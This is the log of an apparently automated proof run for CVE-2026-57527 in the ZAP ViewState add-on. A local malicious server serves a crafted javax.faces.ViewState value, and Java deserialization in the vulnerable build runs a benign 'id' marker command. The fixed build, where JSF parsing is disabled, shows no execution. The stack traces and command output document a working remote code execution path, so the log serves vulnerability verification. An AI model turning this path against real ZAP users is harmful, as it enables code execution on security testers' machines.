============================================================ CVE-2026-57527 - ZAP ViewState add-on product-path proof ============================================================ ROOT=/data/pruva/runs/524a9a59-ea45-4e2d-8576-15b9dac49e83/bundle Date: Sun Jul 5 07:23:03 UTC 2026 [setup] Java: openjdk version "17.0.19" 2026-04-21 [setup] Javac: javac 17.0.19 [setup] Using prepared cache repository: /data/pruva/project-cache/a032c641-95cb-4a13-867e-d136b678d029/repo [setup] Vulnerable commit (fixed parent): 7e686c0900e82bb73b57880c0328d012269f8741 [setup] Fixed commit: ac6c3f94d38505bc0facea286a4d3728044c6e5c Preparing worktree (detached HEAD 7e686c09) Updating files: 58% (22139/37756) Updating files: 59% (22277/37756) Updating files: 60% (22654/37756) Updating files: 61% (23032/37756) Updating files: 62% (23409/37756) Updating files: 63% (23787/37756) Updating files: 64% (24164/37756) Updating files: 65% (24542/37756) Updating files: 66% (24919/37756) Updating files: 67% (25297/37756) Updating files: 68% (25675/37756) Updating files: 69% (26052/37756) Updating files: 70% (26430/37756) Updating files: 71% (26807/37756) Updating files: 72% (27185/37756) Updating files: 73% (27562/37756) Updating files: 74% (27940/37756) Updating files: 75% (28317/37756) Updating files: 76% (28695/37756) Updating files: 77% (29073/37756) Updating files: 78% (29450/37756) Updating files: 79% (29828/37756) Updating files: 80% (30205/37756) Updating files: 81% (30583/37756) Updating files: 82% (30960/37756) Updating files: 83% (31338/37756) Updating files: 84% (31716/37756) Updating files: 85% (32093/37756) Updating files: 86% (32471/37756) Updating files: 87% (32848/37756) Updating files: 88% (33226/37756) Updating files: 89% (33603/37756) Updating files: 89% (33811/37756) Updating files: 90% (33981/37756) Updating files: 91% (34358/37756) Updating files: 92% (34736/37756) Updating files: 93% (35114/37756) Updating files: 94% (35491/37756) Updating files: 95% (35869/37756) Updating files: 96% (36246/37756) Updating files: 97% (36624/37756) Updating files: 98% (37001/37756) Updating files: 99% (37379/37756) Updating files: 100% (37756/37756) Updating files: 100% (37756/37756), done. HEAD is now at 7e686c09 Merge pull request #7480 from zapbot/bump-version Preparing worktree (detached HEAD ac6c3f94) Updating files: 41% (15588/37756) Updating files: 42% (15858/37756) Updating files: 43% (16236/37756) Updating files: 44% (16613/37756) Updating files: 45% (16991/37756) Updating files: 46% (17368/37756) Updating files: 47% (17746/37756) Updating files: 48% (18123/37756) Updating files: 49% (18501/37756) Updating files: 50% (18878/37756) Updating files: 51% (19256/37756) Updating files: 52% (19634/37756) Updating files: 53% (20011/37756) Updating files: 54% (20389/37756) Updating files: 55% (20766/37756) Updating files: 56% (21144/37756) Updating files: 57% (21521/37756) Updating files: 58% (21899/37756) Updating files: 59% (22277/37756) Updating files: 60% (22654/37756) Updating files: 61% (23032/37756) Updating files: 62% (23409/37756) Updating files: 63% (23787/37756) Updating files: 64% (24164/37756) Updating files: 65% (24542/37756) Updating files: 66% (24919/37756) Updating files: 67% (25297/37756) Updating files: 68% (25675/37756) Updating files: 69% (26052/37756) Updating files: 70% (26430/37756) Updating files: 71% (26807/37756) Updating files: 72% (27185/37756) Updating files: 73% (27562/37756) Updating files: 74% (27940/37756) Updating files: 75% (28317/37756) Updating files: 76% (28695/37756) Updating files: 77% (29073/37756) Updating files: 78% (29450/37756) Updating files: 79% (29828/37756) Updating files: 80% (30205/37756) Updating files: 81% (30583/37756) Updating files: 82% (30960/37756) Updating files: 83% (31338/37756) Updating files: 84% (31716/37756) Updating files: 85% (32093/37756) Updating files: 86% (32471/37756) Updating files: 87% (32848/37756) Updating files: 88% (33226/37756) Updating files: 89% (33603/37756) Updating files: 90% (33981/37756) Updating files: 91% (34358/37756) Updating files: 92% (34736/37756) Updating files: 93% (35114/37756) Updating files: 94% (35491/37756) Updating files: 95% (35869/37756) Updating files: 95% (35934/37756) Updating files: 96% (36246/37756) Updating files: 97% (36624/37756) Updating files: 98% (37001/37756) Updating files: 99% (37379/37756) Updating files: 100% (37756/37756) Updating files: 100% (37756/37756), done. HEAD is now at ac6c3f94 Merge pull request #7481 from thc202/viewstate/disable-jsf [verify] Vulnerable ViewStateModel JSF registration: addOns/viewstate/src/main/java/org/zaproxy/zap/extension/viewstate/ViewStateModel.java:62: viewstateParams.add(new ViewState(null, JSFViewState.KEY, "javax.faces.ViewState")); [verify] Fixed ViewStateModel JSF registration is disabled: addOns/viewstate/src/main/java/org/zaproxy/zap/extension/viewstate/ViewStateModel.java:62: // viewstateParams.add(new ViewState(null, JSFViewState.KEY, "javax.faces.ViewState")); [build] Vulnerable add-on: /data/pruva/runs/524a9a59-ea45-4e2d-8576-15b9dac49e83/bundle/repro/build_product_path/worktrees/vulnerable/addOns/viewstate/build/zapAddOn/bin/viewstate-alpha-4.zap [build] Fixed add-on: /data/pruva/runs/524a9a59-ea45-4e2d-8576-15b9dac49e83/bundle/repro/build_product_path/worktrees/fixed/addOns/viewstate/build/zapAddOn/bin/viewstate-alpha-4.zap [compile] Compiling ProductPathHarness against built ZAP component and ZAP core jars === Running vulnerable product-component attempts === payload_bytes=282 payload_bytes=282 [vuln-1] Starting malicious TCP server on port 18101 malicious TCP HTTP server listening on 127.0.0.1:18101 server-log: "GET /malicious-viewstate HTTP/1.1" 200 - served malicious javax.faces.ViewState response to ('127.0.0.1', 47406) 2026-07-05T07:23:32.371089181Z main ERROR Log4j API could not find a logging provider. Defaulting ZAP install dir to /home/vscode/.gradle/caches/modules-2/files-2.1/org.zaproxy/zap/2.17.0/fda340fc4d7ec417dadd3c532b5c97f36e186d13 [vuln-1] tcp_response_bytes=635 [vuln-1] response_body_contains_jsf=true [vuln-1] real_HttpMessage_response_body_length=482 [vuln-1] factory=org.zaproxy.zap.extension.viewstate.ExtensionHttpPanelViewStateView$ResponseSplitBodyViewStateViewFactory [vuln-1] view=org.zaproxy.zap.extension.viewstate.HttpPanelViewStateView [vuln-1] view_loaded_from=file:/data/pruva/runs/524a9a59-ea45-4e2d-8576-15b9dac49e83/bundle/repro/build_product_path/worktrees/vulnerable/addOns/viewstate/build/zapAddOn/bin/viewstate-alpha-4.zap [vuln-1] model=org.zaproxy.zap.extension.viewstate.ViewStateModel ViewStateModel.loaded_from=file:/data/pruva/runs/524a9a59-ea45-4e2d-8576-15b9dac49e83/bundle/repro/build_product_path/worktrees/vulnerable/addOns/viewstate/build/zapAddOn/bin/viewstate-alpha-4.zap ViewStateModel.param_count=3 ViewStateModel.param name=__VIEWSTATE type=ASP ViewStateModel.param name=__VIEWSTATEFIELDCOUNT type=ASP ViewStateModel.param name=javax.faces.ViewState type=JSF ViewStateModel.has_jsf_registration=true [vuln-1] invoking real HttpPanelViewModel.setMessage(HttpMessage) [vuln-1] marker_exists=true [vuln-1] rce_output_exists=true [vuln-1] marker_content_begin DESERIALIZATION_RCE_CONFIRMED command=id > '/data/pruva/runs/524a9a59-ea45-4e2d-8576-15b9dac49e83/bundle/repro/artifacts/vuln_rce_output_1.txt'; echo RCE_VIA_ZAP_VIEWSTATE_PRODUCT_PATH >> '/data/pruva/runs/524a9a59-ea45-4e2d-8576-15b9dac49e83/bundle/repro/artifacts/vuln_rce_output_1.txt' process_exit=0 id: cannot find name for group ID 969 runtime_stacktrace_begin at java.base/java.lang.Thread.getStackTrace(Thread.java:1619) at EvilPayload.readObject(EvilPayload.java:33) at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method) at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:77) at java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) at java.base/java.lang.reflect.Method.invoke(Method.java:569) at java.base/java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1100) at java.base/java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:2423) at java.base/java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:2257) at java.base/java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1733) at java.base/java.io.ObjectInputStream.readObject(ObjectInputStream.java:509) at java.base/java.io.ObjectInputStream.readObject(ObjectInputStream.java:467) at org.zaproxy.zap.extension.viewstate.zap.utils.JSFViewState.decode(JSFViewState.java:92) at org.zaproxy.zap.extension.viewstate.zap.utils.JSFViewState.decode(JSFViewState.java:76) at org.zaproxy.zap.extension.viewstate.zap.utils.ViewState.getDecodedValue(ViewState.java:64) at org.zaproxy.zap.extension.viewstate.ViewStateModel.getData(ViewStateModel.java:183) at org.zaproxy.zap.extension.viewstate.HttpPanelViewStateView.dataChanged(HttpPanelViewStateView.java:189) at org.zaproxy.zap.extension.httppanel.view.DefaultHttpPanelViewModel.notifyAllListeners(DefaultHttpPanelViewModel.java:74) at org.zaproxy.zap.extension.httppanel.view.DefaultHttpPanelViewModel.fireDataChanged(DefaultHttpPanelViewModel.java:68) at org.zaproxy.zap.extension.httppanel.view.DefaultHttpPanelViewModel.setMessage(DefaultHttpPanelViewModel.java:42) at org.zaproxy.zap.extension.httppanel.view.impl.models.http.AbstractHttpByteHttpPanelViewModel.setMessage(AbstractHttpByteHttpPanelViewModel.java:34) at ProductPathHarness.main(ProductPathHarness.java:121) runtime_stacktrace_end [vuln-1] marker_content_end [vuln-1] rce_output_begin uid=1000(vscode) gid=1000(vscode) groups=1000(vscode),969(969) RCE_VIA_ZAP_VIEWSTATE_PRODUCT_PATH [vuln-1] rce_output_end [vuln-1] harness_exit=0 [vuln-1] PASS: RCE marker and original ViewStateModel -> JSFViewState.decode stack observed payload_bytes=282 payload_bytes=282 [vuln-2] Starting malicious TCP server on port 18102 malicious TCP HTTP server listening on 127.0.0.1:18102 server-log: "GET /malicious-viewstate HTTP/1.1" 200 - served malicious javax.faces.ViewState response to ('127.0.0.1', 58758) 2026-07-05T07:23:33.054473494Z main ERROR Log4j API could not find a logging provider. Defaulting ZAP install dir to /home/vscode/.gradle/caches/modules-2/files-2.1/org.zaproxy/zap/2.17.0/fda340fc4d7ec417dadd3c532b5c97f36e186d13 [vuln-2] tcp_response_bytes=635 [vuln-2] response_body_contains_jsf=true [vuln-2] real_HttpMessage_response_body_length=482 [vuln-2] factory=org.zaproxy.zap.extension.viewstate.ExtensionHttpPanelViewStateView$ResponseSplitBodyViewStateViewFactory [vuln-2] view=org.zaproxy.zap.extension.viewstate.HttpPanelViewStateView [vuln-2] view_loaded_from=file:/data/pruva/runs/524a9a59-ea45-4e2d-8576-15b9dac49e83/bundle/repro/build_product_path/worktrees/vulnerable/addOns/viewstate/build/zapAddOn/bin/viewstate-alpha-4.zap [vuln-2] model=org.zaproxy.zap.extension.viewstate.ViewStateModel ViewStateModel.loaded_from=file:/data/pruva/runs/524a9a59-ea45-4e2d-8576-15b9dac49e83/bundle/repro/build_product_path/worktrees/vulnerable/addOns/viewstate/build/zapAddOn/bin/viewstate-alpha-4.zap ViewStateModel.param_count=3 ViewStateModel.param name=__VIEWSTATE type=ASP ViewStateModel.param name=__VIEWSTATEFIELDCOUNT type=ASP ViewStateModel.param name=javax.faces.ViewState type=JSF ViewStateModel.has_jsf_registration=true [vuln-2] invoking real HttpPanelViewModel.setMessage(HttpMessage) [vuln-2] marker_exists=true [vuln-2] rce_output_exists=true [vuln-2] marker_content_begin DESERIALIZATION_RCE_CONFIRMED command=id > '/data/pruva/runs/524a9a59-ea45-4e2d-8576-15b9dac49e83/bundle/repro/artifacts/vuln_rce_output_2.txt'; echo RCE_VIA_ZAP_VIEWSTATE_PRODUCT_PATH >> '/data/pruva/runs/524a9a59-ea45-4e2d-8576-15b9dac49e83/bundle/repro/artifacts/vuln_rce_output_2.txt' process_exit=0 id: cannot find name for group ID 969 runtime_stacktrace_begin at java.base/java.lang.Thread.getStackTrace(Thread.java:1619) at EvilPayload.readObject(EvilPayload.java:33) at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method) at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:77) at java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) at java.base/java.lang.reflect.Method.invoke(Method.java:569) at java.base/java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1100) at java.base/java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:2423) at java.base/java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:2257) at java.base/java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1733) at java.base/java.io.ObjectInputStream.readObject(ObjectInputStream.java:509) at java.base/java.io.ObjectInputStream.readObject(ObjectInputStream.java:467) at org.zaproxy.zap.extension.viewstate.zap.utils.JSFViewState.decode(JSFViewState.java:92) at org.zaproxy.zap.extension.viewstate.zap.utils.JSFViewState.decode(JSFViewState.java:76) at org.zaproxy.zap.extension.viewstate.zap.utils.ViewState.getDecodedValue(ViewState.java:64) at org.zaproxy.zap.extension.viewstate.ViewStateModel.getData(ViewStateModel.java:183) at org.zaproxy.zap.extension.viewstate.HttpPanelViewStateView.dataChanged(HttpPanelViewStateView.java:189) at org.zaproxy.zap.extension.httppanel.view.DefaultHttpPanelViewModel.notifyAllListeners(DefaultHttpPanelViewModel.java:74) at org.zaproxy.zap.extension.httppanel.view.DefaultHttpPanelViewModel.fireDataChanged(DefaultHttpPanelViewModel.java:68) at org.zaproxy.zap.extension.httppanel.view.DefaultHttpPanelViewModel.setMessage(DefaultHttpPanelViewModel.java:42) at org.zaproxy.zap.extension.httppanel.view.impl.models.http.AbstractHttpByteHttpPanelViewModel.setMessage(AbstractHttpByteHttpPanelViewModel.java:34) at ProductPathHarness.main(ProductPathHarness.java:121) runtime_stacktrace_end [vuln-2] marker_content_end [vuln-2] rce_output_begin uid=1000(vscode) gid=1000(vscode) groups=1000(vscode),969(969) RCE_VIA_ZAP_VIEWSTATE_PRODUCT_PATH [vuln-2] rce_output_end [vuln-2] harness_exit=0 [vuln-2] PASS: RCE marker and original ViewStateModel -> JSFViewState.decode stack observed === Running fixed product-component negative controls === payload_bytes=284 payload_bytes=284 [fixed-1] Starting malicious TCP server on port 18201 malicious TCP HTTP server listening on 127.0.0.1:18201 server-log: "GET /malicious-viewstate HTTP/1.1" 200 - served malicious javax.faces.ViewState response to ('127.0.0.1', 56612) 2026-07-05T07:23:33.836641744Z main ERROR Log4j API could not find a logging provider. Defaulting ZAP install dir to /home/vscode/.gradle/caches/modules-2/files-2.1/org.zaproxy/zap/2.17.0/fda340fc4d7ec417dadd3c532b5c97f36e186d13 [fixed-1] tcp_response_bytes=639 [fixed-1] response_body_contains_jsf=true [fixed-1] real_HttpMessage_response_body_length=486 [fixed-1] factory=org.zaproxy.zap.extension.viewstate.ExtensionHttpPanelViewStateView$ResponseSplitBodyViewStateViewFactory [fixed-1] view=org.zaproxy.zap.extension.viewstate.HttpPanelViewStateView [fixed-1] view_loaded_from=file:/data/pruva/runs/524a9a59-ea45-4e2d-8576-15b9dac49e83/bundle/repro/build_product_path/worktrees/fixed/addOns/viewstate/build/zapAddOn/bin/viewstate-alpha-4.zap [fixed-1] model=org.zaproxy.zap.extension.viewstate.ViewStateModel ViewStateModel.loaded_from=file:/data/pruva/runs/524a9a59-ea45-4e2d-8576-15b9dac49e83/bundle/repro/build_product_path/worktrees/fixed/addOns/viewstate/build/zapAddOn/bin/viewstate-alpha-4.zap ViewStateModel.param_count=2 ViewStateModel.param name=__VIEWSTATE type=ASP ViewStateModel.param name=__VIEWSTATEFIELDCOUNT type=ASP ViewStateModel.has_jsf_registration=false [fixed-1] invoking real HttpPanelViewModel.setMessage(HttpMessage) [fixed-1] marker_exists=false [fixed-1] rce_output_exists=false [fixed-1] harness_exit=0 [fixed-1] PASS: fixed built add-on processes the response with JSF registration absent; no deserialization marker payload_bytes=284 payload_bytes=284 [fixed-2] Starting malicious TCP server on port 18202 malicious TCP HTTP server listening on 127.0.0.1:18202 server-log: "GET /malicious-viewstate HTTP/1.1" 200 - served malicious javax.faces.ViewState response to ('127.0.0.1', 49868) 2026-07-05T07:23:34.519020486Z main ERROR Log4j API could not find a logging provider. Defaulting ZAP install dir to /home/vscode/.gradle/caches/modules-2/files-2.1/org.zaproxy/zap/2.17.0/fda340fc4d7ec417dadd3c532b5c97f36e186d13 [fixed-2] tcp_response_bytes=639 [fixed-2] response_body_contains_jsf=true [fixed-2] real_HttpMessage_response_body_length=486 [fixed-2] factory=org.zaproxy.zap.extension.viewstate.ExtensionHttpPanelViewStateView$ResponseSplitBodyViewStateViewFactory [fixed-2] view=org.zaproxy.zap.extension.viewstate.HttpPanelViewStateView [fixed-2] view_loaded_from=file:/data/pruva/runs/524a9a59-ea45-4e2d-8576-15b9dac49e83/bundle/repro/build_product_path/worktrees/fixed/addOns/viewstate/build/zapAddOn/bin/viewstate-alpha-4.zap [fixed-2] model=org.zaproxy.zap.extension.viewstate.ViewStateModel ViewStateModel.loaded_from=file:/data/pruva/runs/524a9a59-ea45-4e2d-8576-15b9dac49e83/bundle/repro/build_product_path/worktrees/fixed/addOns/viewstate/build/zapAddOn/bin/viewstate-alpha-4.zap ViewStateModel.param_count=2 ViewStateModel.param name=__VIEWSTATE type=ASP ViewStateModel.param name=__VIEWSTATEFIELDCOUNT type=ASP ViewStateModel.has_jsf_registration=false [fixed-2] invoking real HttpPanelViewModel.setMessage(HttpMessage) [fixed-2] marker_exists=false [fixed-2] rce_output_exists=false [fixed-2] harness_exit=0 [fixed-2] PASS: fixed built add-on processes the response with JSF registration absent; no deserialization marker ============================================================ VERDICT: VULNERABILITY CONFIRMED ============================================================ Vulnerable attempts with RCE through original path: 2/2 Fixed negative controls without RCE: 2/2 [manifest] runtime_manifest.json written